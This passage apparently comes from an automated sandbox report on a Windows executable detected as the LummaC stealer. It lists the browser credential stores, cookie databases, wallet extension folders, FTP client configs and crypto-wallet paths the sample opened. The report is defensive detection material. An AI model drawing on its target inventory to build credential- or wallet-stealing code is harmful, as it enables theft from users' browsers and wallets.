Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.3.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: DPlvBkg4aj.exe PID: 1068, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: DPlvBkg4aj.exe, 00000000.00000002.1934935562.0000000000739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: DPlvBkg4aj.exe, 00000000.00000002.1934935562.0000000000739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: DPlvBkg4aj.exe, 00000000.00000002.1934935562.0000000000739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: DPlvBkg4aj.exe, 00000000.00000002.1934935562.0000000000739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: DPlvBkg4aj.exe, 00000000.00000002.1934935562.0000000000739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: DPlvBkg4aj.exe, 00000000.00000002.1934935562.0000000000739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: DPlvBkg4aj.exe, 00000000.00000002.1934935562.0000000000739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: DPlvBkg4aj.exe, 00000000.00000002.1934935562.0000000000739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: DPlvBkg4aj.exe, 00000000.00000002.1934935562.0000000000739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
